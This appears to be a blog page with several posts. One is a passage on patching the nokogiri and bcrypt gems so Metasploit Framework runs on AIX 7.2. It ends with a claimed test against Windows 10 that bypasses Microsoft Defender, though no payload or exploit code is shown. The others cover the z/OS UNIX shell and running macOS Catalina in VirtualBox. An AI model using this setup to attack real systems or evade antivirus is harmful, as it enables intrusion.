        2: from /usr/local/lib/ruby/gems/2.5.0/gems/nokogiri-1.10.3/lib/nokogiri.rb:32:in `rescue in <top (required)>'
        1: from /usr/local/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require'
/usr/local/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require': load failed - /usr/local/lib/ruby/gems/2.5.0/gems/nokogiri-1.10.3/lib/nokogiri/nokogir.so. Please issue below command for detailed reasons: (LoadError)
/usr/sbin/execerror ruby "(ld 3 1 vasprintf /usr/local/lib/ruby/gems/2.5.0/gems/nokogiri-1.10.3/lib/nokogiri/nokogiri.so"

When we check the detailed error by running the suggested command we get more details

bash-5.0# /usr/sbin/execerror ruby 
"(ld 3 1 vasprintf /usr/local/lib/ruby/gems/2.5.0/gems/nokogiri-1.10.3/lib/nokogiri/nokogiri.so"
exec(): 0509-036 Cannot load program ruby because of the following errors:
rtld: 0712-001 Symbol vasprintf was referenced from module
/usr/local/lib/ruby/gems/2.5.0/gems/nokogiri-1.10.3/lib/nokogiri/nokogiri.so(),
but a runtime definition of the symbol was not found.

So the vasprintf symbol is referenced by the shared object but no runtime definition exists. We will need to hack through the gem to get it to build on AIX 7.2 then. Luckily it's not that hard.
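The -DUSE_INCLUDED_VASPRINTF flag used in the extconf.rb change further down makes the gem compile its own vasprintf() instead of expecting one from libc. The function below is an added illustration of what such a fallback has to do (it is not nokogiri's bundled implementation and not from this post): measure first with vsnprintf, then allocate exactly that much, so the missing symbol is replaced without introducing a fixed-size buffer that could be overrun.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * compat_vasprintf(): a drop-in replacement for the non-POSIX vasprintf()
 * that AIX libc lacks.  Added example, not nokogiri's bundled vasprintf.c.
 * Uses only C99 facilities (vsnprintf with a NULL buffer, va_copy), so it
 * builds with gcc on AIX 7.2 without any extra library.
 *
 * Two passes: the first measures the formatted length without writing
 * anything, the second writes into a heap buffer of exactly that size.
 * The result is therefore never truncated and never overruns the buffer.
 * Returns the number of characters written (excluding the NUL) or -1 on
 * error, matching the glibc/BSD contract; on error *strp is set to NULL.
 */
int compat_vasprintf(char **strp, const char *fmt, va_list ap)
{
    va_list ap_copy;
    int needed;
    char *buf;

    *strp = NULL;

    /* Pass 1: vsnprintf consumes its va_list, so measure on a copy. */
    va_copy(ap_copy, ap);
    needed = vsnprintf(NULL, 0, fmt, ap_copy);
    va_end(ap_copy);
    if (needed < 0)
        return -1;                      /* encoding or format error */

    buf = malloc((size_t)needed + 1);   /* +1 for the terminating NUL */
    if (buf == NULL)
        return -1;

    /* Pass 2: write for real; the length must match pass 1 exactly. */
    if (vsnprintf(buf, (size_t)needed + 1, fmt, ap) != needed) {
        free(buf);
        return -1;
    }

    *strp = buf;
    return needed;
}

/* Variadic convenience wrapper, mirroring asprintf(). */
int compat_asprintf(char **strp, const char *fmt, ...)
{
    va_list ap;
    int len;

    va_start(ap, fmt);
    len = compat_vasprintf(strp, fmt, ap);
    va_end(ap);
    return len;
}

/* Stand-alone demo with a constructed message (not real nokogiri output). */
int main(void)
{
    char *msg = NULL;
    int len = compat_asprintf(&msg, "nokogiri.so on %s: %d byte(s) of %s",
                              "powerpc-aix7.2.0", 300, "constructed sample text");
    if (len < 0)
        return 1;
    printf("%d: %s\n", len, msg);
    free(msg);
    return 0;
}
```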

Let's create a working directory for our Ruby gem dissection experiments and download the nokogiri one.

$ mkdir GEMS
$ cd GEMS
$ gem fetch nokogiri 
Fetching: nokogiri-1.10.3.gem (100%)
Downloaded nokogiri-1.10.3
$ gem spec nokogiri-1.10.3.gem --ruby > nokogiri.gemspec
$ gem unpack nokogiri-1.10.3.gem
Unpacked gem: '/home/root/LOCAL-GEMS/TT/nokogiri-1.10.3'
$ mv nokogiri.gemspec nokogiri-1.10.3
$ cd  nokogiri-1.10.3
$ cd ext/nokogiri

Now we will modify the extconf.rb file so that the build procedure produces a working nokogiri.so shared library on AIX. Locate the following line under the nix? branch:

$CFLAGS <<

And change to

$CFLAGS << " -DXP_WIN -DXP_WIN32 -DUSE_INCLUDED_VASPRINTF "

Save and return to building nokogiri gem

$ cd ../.. 
$ gem build nokogiri.gemspec 
WARNING:  ports/archives/libxml2-2.9.9.tar.gz is not world-readable
WARNING:  ports/archives/libxslt-1.1.33.tar.gz is not world-readable
WARNING:  no homepage specified
WARNING:  pessimistic dependency on mini_portile2 (~> 2.4.0) may be overly strict
  if mini_portile2 is semantically versioned, use:
    add_runtime_dependency 'mini_portile2', '~> 2.4', '>= 2.4.0'
WARNING:  pessimistic dependency on racc (~> 1.4.14, development) may be overly strict
  if racc is semantically versioned, use:
    add_development_dependency 'racc', '~> 1.4', '>= 1.4.14'
WARNING:  pessimistic dependency on rake-compiler (~> 1.0.3, development) may be overly strict
  if rake-compiler is semantically versioned, use:
    add_development_dependency 'rake-compiler', '~> 1.0', '>= 1.0.3'
WARNING:  pessimistic dependency on rexical (~> 1.0.5, development) may be overly strict
  if rexical is semantically versioned, use:
    add_development_dependency 'rexical', '~> 1.0', '>= 1.0.5'
WARNING:  See http://guides.rubygems.org/specification-reference/ for help
  Successfully built RubyGem
  Name: nokogiri
  Version: 1.10.3
  File: nokogiri-1.10.3.gem

$ su 
# gem install  nokogiri-1.10.3.gem

After some time it will eventually build (under qemu it's slow) and we can check whether the final nokogiri gem actually works by executing the gem itself

$ /usr/local/bin/nokogiri  --version
# Nokogiri (1.10.3)
    ---
    warnings: []
    nokogiri: 1.10.3
    ruby:
      version: 2.5.1
      platform: powerpc-aix7.2.0
      description: ruby 2.5.1p57 (2018-03-29 revision 63029) [powerpc-aix7.2.0]
      engine: ruby
    libxml:
      binding: extension
      source: packaged
      libxml2_path: "/usr/local/lib/ruby/gems/2.5.0/gems/nokogiri-1.10.3/ports/powerpc-ibm-aix7.2.3.0/libxml2/2.9.9"
      libxslt_path: "/usr/local/lib/ruby/gems/2.5.0/gems/nokogiri-1.10.3/ports/powerpc-ibm-aix7.2.3.0/libxslt/1.1.33"
      libxml2_patches:
      - 0001-Revert-Do-not-URI-escape-in-server-side-includes.patch
      - 0002-Remove-script-macro-support.patch
      - 0003-Update-entities-to-remove-handling-of-ssi.patch
      libxslt_patches:
      - 0001-Fix-security-framework-bypass.patch
      compiled: 2.9.9
      loaded: 2.9.9

Now let's move on to the last gem, bcrypt; the problem with it is as follows. When running gem install bcrypt we get the following error on AIX 7.2

# gem install bcrypt
Fetching: bcrypt-3.1.13.gem (100%)
Building native extensions. This could take a while...
ERROR:  Error installing bcrypt:
        ERROR: Failed to build gem native extension.

    current directory: /usr/local/lib/ruby/gems/2.5.0/gems/bcrypt-3.1.13/ext/mri
/usr/local/bin/ruby -r ./siteconf20190624-6029732-1f0poah.rb extconf.rb
creating Makefile

current directory: /usr/local/lib/ruby/gems/2.5.0/gems/bcrypt-3.1.13/ext/mri
make "DESTDIR=" clean

current directory: /usr/local/lib/ruby/gems/2.5.0/gems/bcrypt-3.1.13/ext/mri
make "DESTDIR="
compiling bcrypt_ext.c
compiling crypt_blowfish.c
compiling crypt_gensalt.c
compiling wrapper.c
linking shared-object bcrypt_ext.so
gcc: error: x86.o: No such file or directory
make: 1254-004 The error code from the last command is 1.

Stop.

make failed, exit code 2

Gem files will remain installed in /usr/local/lib/ruby/gems/2.5.0/gems/bcrypt-3.1.13 
for inspection.
Results logged to /usr/local/lib/ruby/gems/2.5.0/extensions/powerpc-aix-7/2.5.0-static/bcrypt-3.1.13/gem_make.out

So yet again some strangeness, this time with an x86.o object file on the ppc64 AIX platform … the fix is easy as well, so let's repeat the exercise: fetch the gem and modify the build procedure

$ gem fetch bcrypt 
Fetching: bcrypt-3.1.13.gem (100%)
Downloaded bcrypt-3.1.13
$ gem spec bcrypt-3.1.13.gem --ruby > bcrypt.gemspec
$ gem unpack bcrypt-3.1.13.gem
$ mv bcrypt.gemspec bcrypt-3.1.13 
$ cd bcrypt-3.1.13
$ cd ext/mri

Let's edit extconf.rb again and remove the x86 reference: delete the x86.o entry, save, and rebuild the gem

$ cd ../.. 
$ gem build bcrypt.gemspec
WARNING:  open-ended dependency on rspec (>= 3, development) is not recommended
  if rspec is semantically versioned, use:
    add_development_dependency 'rspec', '~> 3'
WARNING:  See http://guides.rubygems.org/specification-reference/ for help
  Successfully built RubyGem
  Name: bcrypt
  Version: 3.1.13
  File: bcrypt-3.1.13.gem

$ su 
# gem install bcrypt-3.1.13.gem
Building native extensions. This could take a while...
Successfully installed bcrypt-3.1.13
Parsing documentation for bcrypt-3.1.13
Installing ri documentation for bcrypt-3.1.13
Done installing documentation for bcrypt after 26 seconds
1 gem installed

Now we should be all set to install the missing gems needed for Metasploit framework so just run bundle install from the metasploit root directory

$ cd metasploit-framework-master
$ bundle install

Make some coffee/tea as this will take some time … I went outside to see the world around me

So now we are ready to run Metasploit Framework on AIX 7.2 ? Yes we are !

We can run ./msfconsole and hope all works (again this takes some time under qemu)

And even do a live test against an up-to-date Windows 10 1903 (10.0.18362.175) and bypass MS Defender while we are at it ;)

And a video demonstration of how it runs/works on AIX against Win10

z/OS UNIX first look


Accessing the UNIX shell from the z/OS TSO session is really simple, and it was the only thing I really wanted to see. I will only highlight some points of interest from the UNIX perspective here, like the shell environment, structure, commands and compilers. We will build a simple C program at the end.

So once we login via TSO

In the menu we will select option 6 [Command]   <ENTER>

And enter the TSO command OMVS

– The following is taken from https://www.ibm.com/support/knowledgecenter/zosbasics/com.ibm.zos.zconcepts/zconc_whatiszunix.htm

The OMVS command is used to invoke the z/OS UNIX shell. Users whose primary interactive computing environment is a UNIX system should find the z/OS UNIX shell environment familiar.

You use the OMVS command to invoke the z/OS UNIX shell.

The shell is a command processor that you use to:

  • Invoke shell commands or utilities that request services from the system.
  • Write shell scripts using the shell programming language.
  • Run shell scripts and C-language programs interactively (in the foreground), in the background, or in batch.

Shell commands often have options (also known as flags) that you can specify, and they usually take an argument, such as the name of a file or directory. The format for specifying the command begins with the command name, then the option or options, and finally the argument, if any.

For example, in Figure 1 the following command is shown:

ls -al /u/rogers

where ls is the command name, and -al are the options.

Figure 1. OMVS shell session display after issuing the OMVS command
ROGERS @ SC43:/>ls -al /u/rogers
total 408
drwx------  3 ADMIN   SYS1           8192 Aug  1 2005  .
dr-xr-xr-x 93 AAAAAAA TTY               0 Feb 13 11:14 ..
-rwxr-xr-x  1 ADMIN   SYS1            979 Feb 29 1996  .profile
-rw-------  1 ADMIN   SYS1             29 Mar  1 1996  .sh_history
-rw-r--r--  1 AAAAAAA SYS1          84543 Apr 28 2007  Sc.pdf
drwxr-xr-x  2 AAAAAAA SYS1           8192 Jun 25 2001  data
-rw-r--r--  1 AAAAAAA SYS1          47848 Jun 26 2004  inventory.export
-rwx------  1 AAAAAAA SYS1             16 Aug  1 2005  myfile
-rw-r--r--  1 AAAAAAA SYS1          43387 Jun 22 2007  print.export

This command lists the files and directories of the user. If the pathname is a file, ls displays information on the file according to the requested options. If it is a directory, ls displays information on the files and subdirectories therein. You can get information on a directory itself by using the -d option.

If you do not specify any options, ls displays only the file names. When ls sends output to a pipe or file, it writes one name per line; when it sends output to the terminal, it uses the -C (multi-column) format.

Terminology note: z/OS users tend to use the terms data set and file synonymously, but not when it comes to z/OS UNIX System Services. With the UNIX support in z/OS, the file system is a data set that contains directories and files. So file has a very specific definition. z/OS UNIX files are different from other z/OS data sets because they are byte-oriented rather than record-oriented.

So we will end up with the following screen

One important thing to understand here is the prompt at the bottom of the x3270 terminal

===> this is where all the commands go (it is slightly weird to get used to)

We can run stuff like “id , whoami, env … ”

Check the process tree via ps

The filesystem is not complex and is quite simple really; most system binaries reside in /bin, /usr/sbin and /usr/lpp, as we can see from the above screenshot

Even Java is there (in this example it is an aged version of z/OS)

sshd and all the related programs are available (again aged in this version)

And of course some C compilers

And finally a small test to compile a simplest of C programs … unfortunately I could not figure out how to define the x3270 terminal for the vi editor so I have used ed instead.

ed is a line editor which you can use in emergencies like this :)

 

Running macOS Catalina Beta on VirtualBox Linux


A short entry here on how to get the latest macOS running inside VirtualBox on your Linux machine (x86_64 Intel). We will need the following :

  • Linux x86_64 (I'm using Mint 19.1), Intel Core CPU with at least 8 GB RAM and a decent fast SSD drive
  • VirtualBox (current 6.0.8)
  • macOS Catalina install ISO (vanilla)
  • Clover.iso
  • Extra USB mouse (for USB pass-through in VirtualBox)

I have prepared Clover for 1280×1024 resolution, in both SIP-enabled and SIP-disabled versions, and the whole howto will be about running Catalina in 1280×1024 (if you want to change this you should read the customizing Clover article here -> https://astr0baby.wordpress.com/2019/01/19/customizing-the-clover-iso-mojave-loader/ )


SIP-Enabled 1280×1024 Clover.iso can be downloaded here -> https://mega.nz/#!S4MAhQoZ!nrAKce_AFhxZLm21sIjwHFpeFw6dW7Salpvs50tywYg

SIP-Disabled 1280×1024 Clover.iso can be downloaded here -> https://mega.nz/#!upc21CaT!wCUnzknVODKmbwrC6NCH4engMKU7YpMyn9ezguwwx4A


Catalina-Beta iso can be downloaded here  -> https://gofile.io/?c=MmX49O

Once we have these files downloaded, let's prepare the VirtualBox Catalina environment. First we need to create a new VM with the following values; make sure you use a big enough VDI disk (around 50 GB) and follow the instructions below ..

I am using static IPs for my VMs and separate VLANs so you can change this as you like, the networking script is included below which needs to be executed before the VM starts and only when the vboxnet0 interface is loaded ! (usually after you start VirtualBox)

Here we are using a little trick to fix the “cannot move windows in Catalina VM” if you just use the native VirtualBox mouse, so we will plug in a real secondary USB mouse and add it to USB Device Filters so that the VM can use this directly.

After you create your Catalina VirtualBox environment (make sure you follow the above screenshots correctly, otherwise it won’t work) we will apply the following shellscript to the VirtualBox Catalina Guest (save it as catalina.sh, chmod +x and execute it)

#!/bin/bash
readonly VM_RES="1280x1024"
readonly NAME="Catalina"

VBoxManage modifyvm "$NAME" --usbxhci on --firmware efi --chipset ich9 --mouse usbtablet --keyboard usb
VBoxManage setextradata "$NAME" "CustomVideoMode1" "${VM_RES}x32"
VBoxManage setextradata "$NAME" VBoxInternal2/EfiGraphicsResolution "$VM_RES"
VBoxManage modifyvm "$NAME" --cpuidset 00000001 000106e5 00100800 0098e3fd bfebfbff
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "iMac11,3"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Iloveapple"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/smc/0/Config/DeviceKey" "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/smc/0/Config/GetKeyFromRealSMC" 1

NETWORK:

Here is the networking script I use (adjust to your needs); you will need the uml-utilities and bridge-utils packages (on Debian/Ubuntu just run sudo apt-get install uml-utilities bridge-utils)

#!/bin/bash
# Setup tap and bridge (run as root; replace "user" with your login name)
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl setfd br0 0
ifconfig enp0s25 10.0.2.1 up
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 vboxnet0
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
# NAT the guest traffic out through the wireless uplink
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

Next we will boot Catalina.iso normally via VirtualBox, get to the first stage macOS installer, erase the disk, create an APFS partition and install. Again this is exactly the same as the previous Mojave install (you can see the details here https://astr0baby.wordpress.com/2018/09/25/running-macos-mojave-10-14-on-virtualbox-5-2-18-on-linux-x86_64/ )

Once the 1st stage installer finishes (takes about 5 – 10 minutes) system will go for reboot, wait for it to do the cycle and when it comes back up again to the same installer just shut down the VM and replace the ISO from Catalina.iso to the Clover.iso we have downloaded earlier, this step is needed because the new drive is partitioned with APFS and current VirtualBox UEFI cannot see it. Clover.iso has these so we must use it as a bootloader every time we want to run Catalina in VirtualBox.

Next boot Catalina again with Clover.iso in place and select the Installer partition (move the arrow keys – mouse does not work there) and enter for confirmation.

The 2nd installer stage will take considerably longer (around 30 minutes on a good SSD drive), so be patient. Once that is done the system will reboot once more (if it gets stuck just hard-reset and boot again)

We boot Catalina again from VirtualBox (if you see errors on screen, shut down the VM and start again, this occasionally happens) and wait for the final user setup, network stuff etc.

For networking I'm using the following setup (change accordingly if you wish to use other values)

IP 10.0.2.12   NetMask  255.255.255.0  GW: 10.0.2.2  DNS 8.8.8.8

We should be done and Catalina is up and online …

Now you will observe that there are two usable mice; for working inside the Catalina guest, use the USB mouse we chose in USB pass-through in VirtualBox

P.S. In scaled mode the Clover menu does not work well for some reason and one cannot use the arrow keys to select the boot entry, so do not use scaled mode when booting Catalina; you can switch to scaled mode immediately after it boots

Updates work well, you just need to select the installer partition in Clover next time macOS gets a system update, which again takes some time to install.  As of now you can see there is a 3rd Beta already released  https://developer.apple.com/news/releases/?id=07022019e

 

 
